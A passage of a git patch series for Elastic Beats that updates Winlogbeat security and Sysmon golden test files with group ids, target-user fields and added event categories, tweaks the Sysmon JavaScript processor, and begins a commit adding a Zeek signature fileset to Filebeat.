"id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", + "name": "testdistlocal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json index e5da6a981547..c903452389dd 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", + "name": "testdistlocal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json index 78d9a0146b6a..3d620a576f07 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json index fd9687692199..c1409cf74117 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json index 4933fc9371a9..aabca7b49f0c 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json index 52db79ef5381..0e9aa9016991 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", + "name": "testglobal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json index c4eaab128204..76fb4727e1f5 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", + "name": "testglobal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json index 401a7005e4c7..df5d283bb3cf 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json index 1519fe28c2c6..ed306992f890 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json index 2e2445dd16c3..b3842d0b7c71 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json index 353394a452ac..3c177519316e 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", + "name": "testuni2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json index 688e0f7c5aa5..b31bf25e3f8e 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", + "name": "testuni2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json index 431f161b48bc..cb288f808ee4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json index f7944a0c686d..8f3d01584d63 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json @@ -4,7 +4,8 @@ "event": { "action": "session-reconnected", "category": [ - "authentication" + "authentication", + "session" ], "code": 4778, "kind": "event", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json index 93f89a592a6d..0c8fb8171a06 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json @@ -4,7 +4,8 @@ "event": { "action": "session-disconnected", "category": [ - "authentication" + "authentication", + "session" ], "code": 4779, "kind": "event", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json index c849ac7c402f..cdd1450d86c4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1110", "name": "DnsUpdateProxy" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json index 489ea32ae304..c7e1105ac1cf 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", + "name": "test_group2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json index 971694737da8..c9bf1f239694 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", + "name": "test_group2v2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json index e538fa47a1a7..0c22e3a226d4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json index a7021cfd3a2c..dfd76b52414f 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json index 5cdec92fafb7..3768dc8e845b 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", + "name": "test_group1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json index bf4540b62cb3..43dafddae907 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", + "name": "test_group1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json index e47e1e32ccaf..24089b7f65cc 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1v1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json index dc4d99b087ed..37c7ec70a687 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1v1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json index 7827d002a2cb..0eb1d5a9b482 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json index 2389eb533ea2..63dd5670366d 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json index 83035c20d465..22a5fd75508c 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json index d4ec0369bf8d..3402221270b1 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", + "name": "Test_group3v2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json index d54323688b8c..765601106302 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", + "name": "Test_group3v2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json index 685292a5c0d5..54dd5ddcf7eb 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json index 17ca0872e471..ff37d5288886 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json index bbac172350c0..caca7eca7f2e 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "Builtin", + "id": "S-1-5-32-544", "name": "Administrators" }, "host": { diff --git a/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js b/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js index 17f1d0a914fc..372912027a5b 100644 --- a/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js +++ b/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js @@ -330,13 +330,16 @@ var sysmon = (function () { }; var addUser = function (evt) { + var id = evt.Get("winlog.user.identifier"); + if (id) { + evt.Put("user.id", id); + } var userParts = evt.Get("winlog.event_data.User"); if (!userParts) { return; } userParts = userParts.split("\\"); if (userParts.length === 2) { - evt.Delete("user"); evt.Put("user.domain", userParts[0]); evt.Put("user.name", userParts[1]); evt.AppendTo("related.user", userParts[1]); @@ -1192,7 +1195,7 @@ var sysmon = (function () { .Add(parseUtcTime) .AddFields({ fields: { - category: ["configuration"], + category: ["configuration", "registry"], type: ["change"], }, target: "event", @@ -1231,7 +1234,7 @@ var sysmon = (function () { .Add(parseUtcTime) .AddFields({ fields: { - category: ["configuration"], + category: ["configuration", "registry"], type: ["change"], }, target: "event", @@ -1270,7 +1273,7 @@ var sysmon = (function () { .Add(parseUtcTime) .AddFields({ fields: { - category: ["configuration"], + category: ["configuration", "registry"], type: ["change"], }, target: "event", diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json index d5d5c494791a..5f333e3aee22 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json @@ -55,6 +55,7 @@ }, "user": { "domain": "VAGRANT-2012-R2", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { @@ -127,6 +128,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "LOCAL SERVICE" }, "winlog": { @@ -198,6 +200,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json index 5dcbcaab9428..5da24c16db5c 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json @@ -3,7 +3,8 @@ "@timestamp": "2020-05-05T14:57:40.589Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -67,7 +68,8 @@ "@timestamp": "2020-05-05T14:57:44.714Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -125,7 +127,8 @@ "@timestamp": "2020-05-05T14:57:44.714Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -189,7 +192,8 @@ "@timestamp": "2020-05-05T14:57:46.808Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -247,7 +251,8 @@ "@timestamp": "2020-05-05T14:57:46.808Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json index 7b1027046851..678f5fe9fdf0 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json @@ -57,6 +57,7 @@ }, "user": { "domain": "VAGRANT", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json index 71e0fcc639de..82df773ae157 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json @@ -144,6 +144,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -236,6 +237,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -422,6 +424,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -506,6 +509,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -581,6 +585,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -656,6 +661,7 @@ }, "user": { "domain": "VAGRANT-2012-R2", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { @@ -731,6 +737,7 @@ }, "user": { "domain": "VAGRANT-2012-R2", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { @@ -806,6 +813,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -884,6 +892,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -962,6 +971,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1036,6 +1046,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1110,6 +1121,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1187,6 +1199,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1264,6 +1277,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1338,6 +1352,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1413,6 +1428,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1491,6 +1507,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1569,6 +1586,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1647,6 +1665,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { From e332d9d27786ef8b301144ae3c87139c773aa812 Mon Sep 17 00:00:00 2001 From: Alex Resnick Date: Tue, 16 Feb 2021 17:57:30 -0600 Subject: [PATCH 60/63] Add Zeek Signatures (#23772) Add the Signature fileset to the Zeek module for Filbeat. Co-authored-by: Andrew Kroh --- CHANGELOG.next.asciidoc | 2 + filebeat/docs/fields.asciidoc | 67 ++++++++++++++ x-pack/filebeat/filebeat.reference.yml | 4 +- x-pack/filebeat/module/zeek/_meta/config.yml | 4 +- x-pack/filebeat/module/zeek/fields.go | 2 +- .../module/zeek/signature/_meta/fields.yml | 35 ++++++++ .../zeek/signature/config/signature.yml | 50 +++++++++++ .../module/zeek/signature/ingest/pipeline.yml | 89 +++++++++++++++++++ .../module/zeek/signature/manifest.yml | 19 ++++ .../zeek/signature/test/signature-json.log | 1 + .../test/signature-json.log-expected.json | 48 ++++++++++ x-pack/filebeat/modules.d/zeek.yml.disabled | 4 +- 12 files changed, 321 insertions(+), 4 deletions(-) create mode 100644 x-pack/filebeat/module/zeek/signature/_meta/fields.yml create mode 100644 x-pack/filebeat/module/zeek/signature/config/signature.yml create mode 100644 x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/zeek/signature/manifest.yml create mode 100644 x-pack/filebeat/module/zeek/signature/test/signature-json.log create mode 100644 x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index e42f4d99c23f..6d94b576e15e 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -840,6 +840,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] - Added string splitting for httpjson input {pull}24022[24022] - Added field mappings for Netflow/IPFIX vendor fields that are known to Filebeat. {issue}23771[23771] +- Added Signatures fileset to Zeek module {pull}23772[23772] - Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] - Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] - Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] 